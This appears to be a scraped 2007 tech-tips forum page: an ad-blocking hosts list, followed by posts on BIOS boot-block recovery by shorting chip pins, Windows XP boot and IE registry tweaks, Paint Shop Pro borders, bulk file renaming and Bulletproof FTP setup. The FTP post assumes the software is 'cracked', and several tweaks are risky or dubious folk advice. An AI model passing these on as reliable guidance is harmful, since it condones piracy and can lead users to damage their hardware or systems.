127.0.0.1 euros4click.de
127.0.0.1 eusta.de
127.0.0.1 exchange-it.com
127.0.0.1 exchange.bg
127.0.0.1 exchangead.com
127.0.0.1 exchangeclicksonline.com
127.0.0.1 exit76.com
127.0.0.1 exitexchange.com
127.0.0.1 exitfuel.com
127.0.0.1 ext4.price.ru
127.0.0.1 extreme-dm.com
127.0.0.1 eyeblaster-bs.com
127.0.0.1 eyeblaster.com
127.0.0.1 eyewonder.com
127.0.0.1 ezula.com
127.0.0.1 f1organizer.com
127.0.0.1 falkag.de
127.0.0.1 falkag.net
127.0.0.1 fast-adv.it
127.0.0.1 fastclick.com
127.0.0.1 fastclick.com.edgesuite.net
127.0.0.1 fastclick.net
127.0.0.1 fastcounter.bcentral.com
127.0.0.1 feedbackresearch.com
127.0.0.1 ffxcam.fairfax.com.au
127.0.0.1 findcommerce.com
127.0.0.1 findyourcasino.com
127.0.0.1 fineclicks.com
127.0.0.1 first.nova.cz
127.0.0.1 flexbanner.com
127.0.0.1 flowgo.com
127.0.0.1 fmads.osdn.com
127.0.0.1 focalex.com
127.0.0.1 fragmentserv.iac-online.de
127.0.0.1 free-banners.com
127.0.0.1 freebanner.com
127.0.0.1 freelogs.com
127.0.0.1 freestat.pl
127.0.0.1 freestats.com
127.0.0.1 freewebcounter.com
127.0.0.1 *BLEEP*-access.com
127.0.0.1 g-wizzads.net
127.0.0.1 galaxien.com
127.0.0.1 gamblingbanner.com
127.0.0.1 gamehouse.com
127.0.0.1 gator.com
127.0.0.1 gcads.osdn.com
127.0.0.1 gcirm.californianonline.com
127.0.0.1 gemius.pl
127.0.0.1 giftsky.org
127.0.0.1 globaltrack.com
127.0.0.1 go-clicks.de
127.0.0.1 goingplatinum.com
127.0.0.1 gold.weborama.fr
127.0.0.1 goldstats.com
127.0.0.1 googlesyndication.com
127.0.0.1 gorillanation.com
127.0.0.1 gostats.com
127.0.0.1 gp.dejanews.com
127.0.0.1 grafstat.ro
127.0.0.1 herbalaffiliateprogram.com
127.0.0.1 hexusads.fluent.ltd.uk
127.0.0.1 hightrafficads.com
127.0.0.1 hit.bg
127.0.0.1 hit.gemius.pl
127.0.0.1 hit.webcentre.lycos.co.uk
127.0.0.1 hitbox.com
127.0.0.1 hitcents.com
127.0.0.1 hitexchange.net
127.0.0.1 hitfarm.com
127.0.0.1 hitlist.ru
127.0.0.1 hitlogger.com
127.0.0.1 hitlounge.com
127.0.0.1 hitometer.com
127.0.0.1 hits4me.com
127.0.0.1 hitslink.com
127.0.0.1 hotlog.ru
127.0.0.1 hotrank.com.tw
127.0.0.1 hotstatistics.com
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 humanclick.com
127.0.0.1 hurricanedigitalmedia.com
127.0.0.1 hyperbanner.net
127.0.0.1 hypercount.com
127.0.0.1 i-clicks.net
127.0.0.1 i1img.com
127.0.0.1 iad.liveperson.net
127.0.0.1 iadnet.com
127.0.0.1 idot.cz
127.0.0.1 igads.no.publicus.com
127.0.0.1 ilbanner.com
127.0.0.1 ilead.itrack.it
127.0.0.1 iliillliO00OO0.321.cn
127.0.0.1 image.ugo.com
127.0.0.1 imageads.canoe.ca
127.0.0.1 images.v3.com
127.0.0.1 imaginemedia.com
127.0.0.1 img.bannersxchange.com
127.0.0.1 imonitor.nethost.cz
127.0.0.1 imprese.cz
127.0.0.1 impressionz.co.uk
127.0.0.1 imrworldwide.com
127.0.0.1 inboxdollars.com
127.0.0.1 inc.com
127.0.0.1 indieclick.com
127.0.0.1 industrybrains.com
127.0.0.1 inet-traffic.com
127.0.0.1 infinite-ads.com
127.0.0.1 information.com
127.0.0.1 insightexpress.com
127.0.0.1 instacontent.net
127.0.0.1 instantmadness.com
127.0.0.1 intelliads.com
127.0.0.1 intellitxt.com
127.0.0.1 internet-optimizer.com
127.0.0.1 internetfuel.com
127.0.0.1 interreklame.de
127.0.0.1 ip.ro
127.0.0.1 ireklama.cz
127.0.0.1 is.casalemedia.com
127.0.0.1 itadnetwork.co.uk
127.0.0.1 itbannerexchange.com
127.0.0.1 itfarm.com
127.0.0.1 itop.cz
127.0.0.1 iwin.com
127.0.0.1 j.2004cms.com
127.0.0.1 jbeet.cjt1.net
127.0.0.1 jcontent.bns1.net
127.0.0.1 jcount.com
127.0.0.1 jedonkey.cjt1.net
127.0.0.1 jinisearch.co.uk
127.0.0.1 jkazaa.cjt1.net
127.0.0.1 jnova.cjt1.net
127.0.0.1 joetec.net
127.0.0.1 jokedollars.com
127.0.0.1 justwebads.com
127.0.0.1 kanoodle.com
127.0.0.1 kliks.nl
127.0.0.1 klipads.dvlabs.com
127.0.0.1 kliptracker.com
127.0.0.1 klix.cz
127.0.0.1 labeldaily.com
127.0.0.1 laih.com
127.0.0.1 lbn.ru
127.0.0.1 leadingedgecash.com
127.0.0.1 lightningcast.net
127.0.0.1 lightspeedcash.com
127.0.0.1 link4ads.com
127.0.0.1 linkbuddies.com
127.0.0.1 linkexchange.com
127.0.0.1 linkexchange.ru
127.0.0.1 linkprice.com
127.0.0.1 linkreferral.com
127.0.0.1 linksponsor.com
127.0.0.1 linkswaper.com
127.0.0.1 linksynergy.com
127.0.0.1 liquidad.narrowcastmedia.com
127.0.0.1 lnads.osdn.com
127.0.0.1 log.btopenworld.com
127.0.0.1 log.go.com
127.0.0.1 logging.to
127.0.0.1 logs.erasmas.com
127.0.0.1 look2me.com
127.0.0.1 lop.com
127.0.0.1 lstat.susanin.com
127.0.0.1 m.doubleclick.net
127.0.0.1 mads.gamespot.com
127.0.0.1 mainos2.mtv3.fi
127.0.0.1 marketbanker.com
127.0.0.1 marketing.centrebet.com
127.0.0.1 marketing.nyi.com
127.0.0.1 marketing.nyi.net
127.0.0.1 marketscore.com
127.0.0.1 mastermind.com
127.0.0.1 masterstats.com
127.0.0.1 matchcraft.com
127.0.0.1 maximumcash.com
127.0.0.1 maxserving.com
127.0.0.1 mbuyu.nl
127.0.0.1 media-adrunner.mycomputer.com
127.0.0.1 media-motor.net
127.0.0.1 media.bigstep.com
127.0.0.1 media.ftv-publicite.fr
127.0.0.1 mediacharger.com
127.0.0.1 mediadvertising.ro
127.0.0.1 mediageneral.com
127.0.0.1 mediamgr.ugo.com
127.0.0.1 mediaplazza.com
127.0.0.1 mediaplex.com
127.0.0.1 mediascale.de
127.0.0.1 mediavantage.de
127.0.0.1 megacash.de
127.0.0.1 megago.com
127.0.0.1 megawerbung.de
127.0.0.1 memorix.sdv.fr
127.0.0.1 metaad.econet.hu
127.0.0.1 metrics.webcriteria.net
127.0.0.1 microstatic.pl
127.0.0.1 microticker.com
127.0.0.1 mindseti.com
127.0.0.1 mirror.qkimg.net
127.0.0.1 mjxads.internet.com
127.0.0.1 mkt.cz
127.0.0.1 mojobucks.com
127.0.0.1 monsterpops.com
127.0.0.1 mostcash.com
127.0.0.1 ms-links.com
127.0.0.1 msads.net
127.0.0.1 mtree.com
127.0.0.1 multi1.rmuk.co.uk
127.0.0.1 musiccounter.ru
127.0.0.1 myaffiliateprogram.com
127.0.0.1 mystat.pl
127.0.0.1 mytrix.com
127.0.0.1 n69.com
127.0.0.1 naj.sk
127.0.0.1 navrcholu.cz
127.0.0.1 nedstat.com
127.0.0.1 nedstat.nl
127.0.0.1 nedstatbasic.net
127.0.0.1 netads.hotwired.com
127.0.0.1 netads.sohu.com
127.0.0.1 netdirect.nl
127.0.0.1 netpool.netbookia.net
127.0.0.1 netvertising.be
127.0.0.1 network.realmedia.com
127.0.0.1 new-ads.eurogamer.net
127.0.0.1 newads.cmpnet.com
127.0.0.1 newnet.qsrch.com
127.0.0.1 newtopsites.com
127.0.0.1 ng3.ads.warnerbros.com
127.0.0.1 ngadcenter.net
127.0.0.1 nitroclicks.com
127.0.0.1 nsads.hotwired.com
127.0.0.1 ntbanner.digitalriver.com
127.0.0.1 oas-central.realmedia.com
127.0.0.1 oas.benchmark.fr
127.0.0.1 oas.foxnews.com
127.0.0.1 oas.roanoke.com
127.0.0.1 oas.salon.com
127.0.0.1 oas.signonsandiego.com
127.0.0.1 oas.toronto.com
127.0.0.1 oas.uniontrib.com
127.0.0.1 oas.villagevoice.com
127.0.0.1 oascentral.chicagobusiness.com
127.0.0.1 oascentral.redherring.com
127.0.0.1 oascentral.theonion.com
127.0.0.1 oascentral.thesmokinggun.com
127.0.0.1 oasis.promon.cz
127.0.0.1 observer.cz
127.0.0.1 offeroptimizer.com
127.0.0.1 oneandonlynetwork.com
127.0.0.1 onestat.com
127.0.0.1 onresponse.com
127.0.0.1 openad.infobel.com
127.0.0.1 openad.travelnow.com
127.0.0.1 overpeer.com
127.0.0.1 overpro.com
127.0.0.1 overture.com
127.0.0.1 oxcash.com
127.0.0.1 p5.omaha.com
127.0.0.1 partner-ads.com
127.0.0.1 partner-source.com
127.0.0.1 partner.gonamic.de
127.0.0.1 partner.topcities.com
127.0.0.1 partner2profit.com
127.0.0.1 partnerkonto.de
127.0.0.1 partners.priceline.com
127.0.0.1 partners.starnetsystems.net
127.0.0.1 paycounter.com
127.0.0.1 paypopup.com
127.0.0.1 payserve.com
127.0.0.1 pbnet.ru
127.0.0.1 pcwizz.com
127.0.0.1 pennyweb.com
127.0.0.1 phoenix-adrunner.mycomputer.com
127.0.0.1 phpads.i-merge.net
127.0.0.1 pillscash.com
127.0.0.1 pimproll.com
127.0.0.1 planetactive.com
127.0.0.1 play4traffic.com
127.0.0.1 pointroll.com
127.0.0.1 pops.freeze.com
127.0.0.1 popup.msn.com
127.0.0.1 popupad.net
127.0.0.1 popupmoney.com
127.0.0.1 popupnation.com
127.0.0.1 popups.infostart.com
127.0.0.1 popupsponsor.com
127.0.0.1 popuptraffic.com
127.0.0.1 porntrack.com
127.0.0.1 postmasterbannernet.com
127.0.0.1 precisioncounter.com
127.0.0.1 premium-offers.com
127.0.0.1 premiumcash.de
127.0.0.1 primaryads.com
127.0.0.1 primetime.net
127.0.0.1 pro-advertising.com
127.0.0.1 profero.com
127.0.0.1 professorbanner.com
127.0.0.1 promote.pair.com
127.0.0.1 promozia.de
127.0.0.1 provexia.com
127.0.0.1 psstt.com
127.0.0.1 pub-g.ifrance.com
127.0.0.1 pub.club-internet.fr
127.0.0.1 pub.hardware.fr
127.0.0.1 pub.realmedia.fr
127.0.0.1 publi.grupocorreo.es
127.0.0.1 publi1.grupocorreo.es
127.0.0.1 publi2.grupocorreo.es
127.0.0.1 publiads.com
127.0.0.1 publicidad.elmundo.es
127.0.0.1 publicidad.ya.com
127.0.0.1 pubs.branchez-vous.com
127.0.0.1 pubs.lemonde.fr
127.0.0.1 q.azcentral.com
127.0.0.1 qckjmp.com
127.0.0.1 qksrv.net
127.0.0.1 quarterserver.de
127.0.0.1 questaffiliates.net
127.0.0.1 quinst.com
127.0.0.1 r.hotwired.com
127.0.0.1 r.kde.cz
127.0.0.1 rad.msn.com
127.0.0.1 radiate.com
127.0.0.1 rampidads.com
127.0.0.1 ranking-charts.de
127.0.0.1 ranking-hits.de
127.0.0.1 rankyou.com
127.0.0.1 rate.ru
127.0.0.1 rb1.design.ru
127.0.0.1 realads.realmedia.com
127.0.0.1 realclix.com
127.0.0.1 realmedia-a800.d4p.net
127.0.0.1 realtechnetwork.com
127.0.0.1 realtechnetwork.net
127.0.0.1 realtracker.com
127.0.0.1 redsherriff.com
127.0.0.1 referralware.com
127.0.0.1 regnow.com
127.0.0.1 reklam.rfsl.se
127.0.0.1 reklama.internet.cz
127.0.0.1 reklama.reflektor.cz
127.0.0.1 relmaxtop.com
127.0.0.1 remotead.cnet.com
127.0.0.1 reply.mediatris.net
127.0.0.1 retaildirect.realmedia.com
127.0.0.1 revenue.net
127.0.0.1 rewardster.com
127.0.0.1 richmails.com
127.0.0.1 richwebmaster.com
127.0.0.1 rightmedia.net
127.0.0.1 rightstats.com
127.0.0.1 rl.auto.ru
127.0.0.1 rle.ru
127.0.0.1 rmads.msn.com
127.0.0.1 rmedia.boston.com
127.0.0.1 rnd.yxo.ru
127.0.0.1 roar.com
127.0.0.1 roings.com
127.0.0.1 roosevelt.gjbig.com
127.0.0.1 rose.ixbt.com
127.0.0.1 rotabanner.dni.ru
127.0.0.1 rotabanner.izvestia.ru
127.0.0.1 rotabanner.rian.ru
127.0.0.1 rpts.net
127.0.0.1 ru-traffic.com
127.0.0.1 ru4.com
127.0.0.1 safe-audit.com
127.0.0.1 safelists.com
127.0.0.1 sageanalyst.net
127.0.0.1 searchlocate.com
127.0.0.1 searchramp.com
127.0.0.1 secure.webconnect.net
127.0.0.1 seeq.com
127.0.0.1 seo4india.com
127.0.0.1 separtnership.com
127.0.0.1 serv0.com
127.0.0.1 servads.aip.org
127.0.0.1 servedby.netshelter.net
127.0.0.1 servethis.com
127.0.0.1 serving-sys.com
127.0.0.1 sexcounter.com
127.0.0.1 sexlist.com
127.0.0.1 sextracker.com
127.0.0.1 sfads.osdn.com
127.0.0.1 shareasale.com
127.0.0.1 sher.index.hu
127.0.0.1 shinystat.it
127.0.0.1 siccash.com
127.0.0.1 sidebar.angelfire.com
127.0.0.1 sitemeter.com
127.0.0.1 sma.punto.net
127.0.0.1 smartadserver.com
127.0.0.1 smartclicks.net
127.0.0.1 smartdirect.com
127.0.0.1 smfgroup.cjb.net
127.0.0.1 smile.modchipstore.com
127.0.0.1 sn.baventures.com
127.0.0.1 softclick.com.br
127.0.0.1 software.global-netcom.de
127.0.0.1 softwaresponsor.com
127.0.0.1 specificclick.com
127.0.0.1 specificpop.com
127.0.0.1 spezialreporte.de
127.0.0.1 spinbox.maccentral.com
127.0.0.1 spinbox.net
127.0.0.1 spinbox.techtracker.com
127.0.0.1 spinbox.versiontracker.com
127.0.0.1 sponsor4you.net
127.0.0.1 sponsoradulto.com
127.0.0.1 sponsorpro.de
127.0.0.1 sponsors.thoughtsmedia.com
127.0.0.1 sprinks-clicks.about.com
127.0.0.1 spylog.com
127.0.0.1 spywarelabs.com
127.0.0.1 spywarenuker.com
127.0.0.1 ssads.osdn.com
127.0.0.1 starffa.com
127.0.0.1 start.freeze.com
127.0.0.1 stat.dealtime.com
127.0.0.1 stat.doxod.net
127.0.0.1 stat.pl
127.0.0.1 stat.webmedia.pl
127.0.0.1 stat.zenon.net
127.0.0.1 statcounter.com
127.0.0.1 static.itrack.it
127.0.0.1 static.smni.com
127.0.0.1 staticads.btopenworld.com
127.0.0.1 stats.blogger.com
127.0.0.1 stats.cts-bv.nl
127.0.0.1 stats.darkbluesea.com
127.0.0.1 stats.klsoft.com
127.0.0.1 stats4all.com
127.0.0.1 stop-popup-ads-now.com
127.0.0.1 sugoicounter.com
127.0.0.1 superclix.de
127.0.0.1 superstats.com
127.0.0.1 supertop.ru
127.0.0.1 supertop100.com
127.0.0.1 synergiinteractive.com
127.0.0.1 targad.de
127.0.0.1 targetnet.com
127.0.0.1 targetpoint.com
127.0.0.1 targetsaver.com
127.0.0.1 targetshop.com
127.0.0.1 teknosurf2.com
127.0.0.1 teknosurf3.com
127.0.0.1 test.com
127.0.0.1 textads.biz
127.0.0.1 textads.opera.com
127.0.0.1 textlinks.com
127.0.0.1 tfag.de
127.0.0.1 the-counter.net
127.0.0.1 theanswerto.com
127.0.0.1 thebannerguru.com
127.0.0.1 thecounter.com
127.0.0.1 thevictorynetwork.com
127.0.0.1 thinkingmedia.net
127.0.0.1 thisbanner.com
127.0.0.1 thruport.com
127.0.0.1 tier1network.com
127.0.0.1 tinybar.com
127.0.0.1 tmsads.tribune.com
127.0.0.1 toads.osdn.com
127.0.0.1 toolbar.netscape.com
127.0.0.1 top.list.ru
127.0.0.1 top.one.ru
127.0.0.1 top.proext.com
127.0.0.1 top100-images.rambler.ru
127.0.0.1 top100.mafia.ru
127.0.0.1 top20.com
127.0.0.1 topbarh.box.sk
127.0.0.1 toplist.cz
127.0.0.1 toplista.mw.hu
127.0.0.1 topping.com.ua
127.0.0.1 topprofits.info
127.0.0.1 toprebates.com
127.0.0.1 topsearcher.com
127.0.0.1 topshop-counter.rambler.ru
127.0.0.1 topstats.com
127.0.0.1 topstats.net
127.0.0.1 tps108.org
127.0.0.1 track.freexxxhost.net
127.0.0.1 tracking.frantic.com
127.0.0.1 tracking101.com
127.0.0.1 trackmysales.com
127.0.0.1 tradedoubler.com
127.0.0.1 traffic-exchange.com
127.0.0.1 trafficdiscount.com
127.0.0.1 trafficmp.com
127.0.0.1 trafficswarm.com
127.0.0.1 trafficsyndicate.com
127.0.0.1 traffictrader.net
127.0.0.1 trafficvenue.net
127.0.0.1 trafic.ro
127.0.0.1 traficdublu.ro
127.0.0.1 trafix.sk
127.0.0.1 trakkerd.net
127.0.0.1 trekblue.com
127.0.0.1 trekdata.com
127.0.0.1 tribalfusion.com
127.0.0.1 trix.net
127.0.0.1 truehits.net
127.0.0.1 truehits1.gits.net.th
127.0.0.1 truehits2.gits.net.th
127.0.0.1 tsms-ad.tsms.com
127.0.0.1 ukaffiliates2.com
127.0.0.1 ukbanners.com
127.0.0.1 ultimatecounter.com
127.0.0.1 updated.com
127.0.0.1 us.a1.yimg.com
127.0.0.1 usapromotravel.com
127.0.0.1 usmsad.tom.com
127.0.0.1 utarget.co.uk
127.0.0.1 utils.mediageneral.net
127.0.0.1 valuead.com
127.0.0.1 valueclick.com
127.0.0.1 valueclick.net
127.0.0.1 valuecommerce.com
127.0.0.1 valuesponsor.com
127.0.0.1 vendaregroup.com
127.0.0.1 vericlick.com
127.0.0.1 vg.ad.asap-asp.net
127.0.0.1 vibrantmedia.com
127.0.0.1 view4cash.de
127.0.0.1 viewpoint.com
127.0.0.1 vortextraffic.com
127.0.0.1 vx2.cc
127.0.0.1 w3exit.com
127.0.0.1 wannaclick.com
127.0.0.1 web-stat.com
127.0.0.1 web2.deja.com
127.0.0.1 webads.bizservers.com
127.0.0.1 webads.co.nz
127.0.0.1 webads.nl
127.0.0.1 webangel.ru
127.0.0.1 webcash.nl
127.0.0.1 webcounter.cz
127.0.0.1 webcounter.goweb.de
127.0.0.1 webmasterplan.com
127.0.0.1 webpdp.gator.com
127.0.0.1 webpower.com
127.0.0.1 websitefreepromotions.com
127.0.0.1 websponsors.com
127.0.0.1 webstars2000.com
127.0.0.1 webstat.com
127.0.0.1 webstat.net
127.0.0.1 webtraxx.de
127.0.0.1 webtrendslive.com
127.0.0.1 wegcash.com
127.0.0.1 wenksdisdkjeilsow.com
127.0.0.1 whenu.com
127.0.0.1 whispa.com
127.0.0.1 window.nixnet.cz
127.0.0.1 windupdates.com
127.0.0.1 wipub.com
127.0.0.1 worldbe.com
127.0.0.1 wtlive.com
127.0.0.1 wustat.windows.com
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 Only the registered members can see the link
127.0.0.1 x.mycity.com
127.0.0.1 xchange.ro
127.0.0.1 xiti.com
127.0.0.1 xq1.net
127.0.0.1 xtrocash.org
127.0.0.1 xxxcounter.com
127.0.0.1 xxxtoolbar.com
127.0.0.1 xzoomy.com
127.0.0.1 y.ibsys.com
127.0.0.1 yesadvertising.com
127.0.0.1 youclick2earn.com
127.0.0.1 z.times.lv
127.0.0.1 zanox-affiliate.de
127.0.0.1 zanox.com
127.0.0.1 zeads.com
127.0.0.1 zedo.com
127.0.0.1 zencudo.co.uk
127.0.0.1 zi.r.tv.com
127.0.0.1 zmedia.com

Master
29-04-07, 00:17
Boot Block Recovery For Free

You don't need to pay a measly sum of dollars just to recover from a boot block mode. Here it is folks:

AWARD Bootblock recovery:

That shorting trick should work if the boot block code is not corrupted, and it should not be if /sb switch is used when flashing the bios (instead of /wb switch).

The 2 pins to short to force a checksum error varies from chip to chip. But these are usually the highest-numbered address pins (A10 and above).

These are the pins used by the system to read the System BIOS (original.bin for award v6), calculate the ROM checksum and see if it's valid before decompressing it into memory, and subsequently allow Bootblock POST to pass control over to the System BIOS.

You just have to fool the system into believing that the System BIOS is corrupt. This you do by giving your system a hard time reading the System BIOS by shorting the 2 high address pins. And when it could not read the System BIOS properly, ROM Checksum Error is detected "so to speak" and Bootblock recovery is activated.

Sometimes, any combination of the high address pins won't work to force a checksum error in some chips, like my Winbond W49F002U. But shorting the #WE pin with the highest-numbered address pin (A17) worked for this chip. You just have to be experimentative if you're not comfortable with "hot flashing" or "replacement BIOS".

But to avoid further damage to your chip if you're not sure which are the correct pins to short, measure the potential between the 2 pins by a voltmeter while the system is on. If the voltage reading is zero (or no potential at all), it is safe to short these pins.

But do not short the pins while the system is on. Instead, power down then do the short, then power up while still shorting. And as soon as you hear 3 beeps (1 long, 2 short), remove the short at once so that automatic reflashing from Drive A can proceed without errors (assuming you had autoexec.bat in it).

About how to do the shorting, the tip of a screwdriver would do. But with such minute pins on the PLCC chip, I'm pretty comfortable doing it with the tip of my multi-tester or voltmeter probe. Short the pins at the point where they come out of the chip.



AMIBIOS Recovery bootblock:
1. Copy a known working BIOS image for your board to a floppy and rename it to AMIBOOT.ROM.
2. Insert the floppy in your system's floppydrive.
3. Power on the system while holding CTRL+Home keys. Release the keys when you hear a beep and/or see the floppy light coming on.
4 . Just wait until you hear 4 beeps. When 4 beeps are heard the reprogramming of the System Block BIOS went succesfull, so then you may restart your system.

Some alternative keys that can be used to force BIOS update (only the System Block will be updated so it's quite safe):
CTRL+Home= restore missing code into system block and clear CMOS when programming went ok.
CTRL+Page Up= restore missing code into system block and clear CMOS or DMI when programming went ok.
CTRL+Page Down= restore missing code into system block and do not clear CMOS and DMI area when programming went ok
Btw: the alternative keys work only with AMIBIOS 7 or higher (so for example an AMI 6.26 BIOS can be only recovered by using CTRL+Home keys).
Boot Block Recovery for FREE

************************************************
BLACKOUT Flashing
*************************************************

Recovering a Corrupt AMI BIOS chip
With motherboards that use BOOT BLOCK BIOS it is possible to recover a corrupted BIOS because the BOOT BLOCK section of the BIOS, which is responsible for booting the computer remains unmodified. When an AMI BIOS becomes corrupt the system will appear to start, but nothing will appear on the screen, the floppy drive light will come on and the system will access the floppy drive repeatedly. If your motherboard has an ISA slot and you have an old ISA video card lying around, put the ISA video card in your system and connect the monitor. The BOOT BLOCK section of the BIOS only supports ISA video cards, so if you do not have an ISA video card or your motherboard does not have ISA slots, you will have to restore your BIOS blind, with no monitor to show you what’s going on.

AMI has integrated a recovery routine into the BOOT BLOCK of the BIOS, which in the event the BIOS becomes corrupt can be used to restore the BIOS to a working state. The routine is called when the SYSTEM BLOCK of the BIOS is empty. The restore routine will access the floppy drive looking for a BIOS file names AMIBOOT.ROM, this is why the floppy drive light comes on and the drive spins. If the file is found it is loaded into the SYSTEM BLOCK of the BIOS to replace the missing information. To restore your BIOS simply copy a working BIOS file to a floppy diskette and rename it AMIBOOT.ROM, then insert it into the computer while the power is on. The diskette does not need to be bootable or contain a flash utility. After about four minutes the system will beep four times. Remove the floppy diskette from the drive and reboot the computer. The BIOS should now be restored.

Recovering a Corrupt AWARD BIOS
With AWARD BIOS the process is similar but still a bit different. To recover an AWARD BIOS you will need to create a floppy diskette with a working BIOS file in .BIN format, an AWARD flash utility and an AUTOEXEC.BAT file. AWARD BIOS will not automatically restore the BIOS information to the SYSTEM BLOCK for this reason you will need to add the commands necessary to flash the BIOS in the AUTOEXEC.BAT file. The system will run the AUTOEXE.BAT file, which will in turn flash the BIOS. This is fairly easy. Here are the steps you need to take.

· Create a bootable floppy diskette
· Copy the BIOS file and flash utility to the diskette
· Create an text file with any standard text editor and add the following lines

@ECHO OFF
FLASH763 BIOSFILE.BIN /py

In the above example I am assuming that you are using the FLASH763.EXE flash utility. You will need to replace the FLASH763 with the name of whatever flash utility you are using, and replace the BIOSFILE.BIN with the name of the BIOS file you are using. You will also need to change the ‘/py’ to whatever the command is for your flash utility to automatically program the BIOS without user intervention. If you do not know the command to automatically flash your BIOS type the name of the flash utility with a space and then /? to display the utility’s help screen. The help screen should pecify the command switch to automatically flash your BIOS. If you are using the FLASH763.EXE utility then the switch to automatically flash your BIOS is ‘/py’.

Master
29-04-07, 00:20
Boot Winxp Fast

Follow the following steps

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

Master
29-04-07, 00:21
Do you want to jazz up your graphics? Want to add a bit of pazazz to your art? Well, this guide features some knowledge, border effects, and even directions to make your own swirlie brushes!

Now, open PSP and get ready to learn! Let's start off with the basics.

-------------------------------------------------
-Border Effects

There are two main types of borders, solid borders, and decorative borders. A solid border is like a colored line that raps around the outside of your image and separates graphics from the rest of the page. You can have borders inside the outside borders to make awesome layer effects. Decorative borders are almost the same, except they are not completely connected. (Example - Dashed Borders)
-------------------------------------------------
Dashed Borders
Open PSP and create an image about 380 x 100 pixels with a white background.

Draw a bit with your paintbrush, just add some color. Now maximize your image.

It should take up the whole page. Now go up to the toolbar on the very top and click "Selections" and go down right below that and click "Select All" There should be a dotted line going around the outside of your image.

We're almost done! YAY! Ok, now look on your keyboard. Go to the very top row next to the F1, F2, F3, F4, and look to the right of the F12 button. It should say "Print Screen". Press it, and it will take a picture of everything currently open on your computer that you can see. Now go to the top toolbar once one. Go under "Edit", move down to "Paste", then move your mouse to the right and select "Paste as New Image"

Now, your image has a dashed border, but you can see all the unwanted parts of your workspace. So go to the left toolbar and click the crop tool. It is the small square with a line through it.

Now drag the segment the crop tool makes just around the image. You might want to zoom in some (Click the magnifying glass on the left toolbar on the spot you want to zoom in). Once you have it fully outlined with the crop segment, double-click to crop it. Wallah! Your image now has a dashed border. So just go to the top toolbar once again, go under "File" and click "Save As". Then, select the spot and name to save it.

-------------------------------------------------
-Font Suggestions and Styles

So you know how to make a cool border for your images. Now what about fonts? Well usually, for siggies, you would put a bigger font saying their name, and a smaller font with sub-text. Look at my signature:



See how it says "Anonymous" in a large font that matches the background; then under it, it says "SOD's coolest member" (my sub-text) in a smaller font? That's the usual format for text on signatures. Of couse, this isn't the only way.

Now, for some font suggestions:

Larger Fonts
Laurenscript
Baby Kruffy (This one is awesome!)
Casual
Chick
Cheri
Walt Disney
Mullet
Dolphins (yippee!)
Jelly Belly
Flubber
Porky's
Gilligan's Island
Cheeseburger

Smaller Fonts
Redensek
Mullet
Georgia
Acknowledge
Tahoma

-------------------------------------------------

Helpful Links


Only the registered members can see the link
(a few popups though)

Font Places


Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link
Only the registered members can see the link

Master
29-04-07, 00:23
So one of your friends, “not you of course”, has managed to nuke Internet Explorer and they are unsure how they did it. You’ve eliminated the possibility of viruses and adware, so this just leaves you and a broken IE. Before you begin to even consider running a repair install of the OS, let’s try to do a repair on IE instead.

THE REPAIR PROCESS

Start the Registry Editor by typing regedit from the Run box. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Active Setup \ Installed Components \ {89820200-ECBD-11cf-8B85-00AA005B4383} and then right-click the “IsInstalled value.” Click Modify. From there, you will change the value from 1 to 0. All right, go ahead and close the editor and reinstall IE from this location. /Only the registered members can see the link

IF SOMETHING GOES WRONG

If messing with the registry and something goes horribly wrong, you can use “Last Known Good Configuration (F8 Safe Mode)” or a Restore Point to get back to where you were before, with your settings. Then you can try again, this time taking care to watch the portion of the registry you are changing. Most people who have troubles with this end up changing the wrong registry key.

Hope this tut helps some members.

Master
29-04-07, 00:24
lets us say you have just download a new album or game
but all the files are .xxx and you need them to be
zip's, rar's, mp3's etc.....
then do the following

-create a new folder
-put all the files needing editing in the new folder
-then goto "run" in the start menu
-type in CMD and click ok

-the next thing needsa few bits of old dos commands
-you need to navagate CMD to the folder whree the files are
-you can do this by 1st getting the total adress of the folder
-and then typing it in cmd with a "cd" in frount
QUOTE
cd c:\xxx\yyy\ccc\

once you in the folder where the files are you can move on
nb u can cheek you in the right folder by typing dir to get a list of files

-now type in....
QUOTE
rename *.* *.zip

Nb change the zip to what ever the extention needs to be (.rar, .mp3 ect)

all done
you should hv now changed the .* to what ever you needed

happy downloading Benji

(by Benji)

nb to exit CMD type in "exit"

Master
29-04-07, 00:25
thanks to someone for this tut.

Configuring your Bulletproof FTP Server Tutorial

I am not sure where I found this tutorial, It’s been a while…It might even have been here... ..So if it is one of yours, my hat goes off to you once again....

After reading the excellent tutorial on "Creating an FTP" that Norway posted…

(I would suggest reading and following his tutorial first, then following up with this one)

I thought that perhaps this tutorial might be pretty helpful for those interested in knowing how to configure their Bulletproof FTP Server that don't already know how... Here's how to get started…

This is for the BulletProof FTP Server 2.10. However, It should work fine on most following versions as well.

I'm assuming you have it installed and cracked.

Basics
1. Start the program.
2. Click on Setup > Main > General from the pull-down menu.
3. Enter your server name into the 'Server Name' box. Under Connection set the “Max number of users" to any number. This is the limit as to how many users can be on your sever at any time.
4. Click on the 'options' tab of that same panel (on the side)
5. Look at the bottom, under IP Options. Put a check in the box “Refuse Multiple Connections from the same IP”. This will prevent one person from blocking your FTP to others.
6. Also put a check in the 'Blocked Banned IP (instead of notifying client). VERY IMPORTANT! If somebody decides to 'Hammer' (attempt to login numerous times VERY quickly) your server/computer may CRASH if you don't enable this.
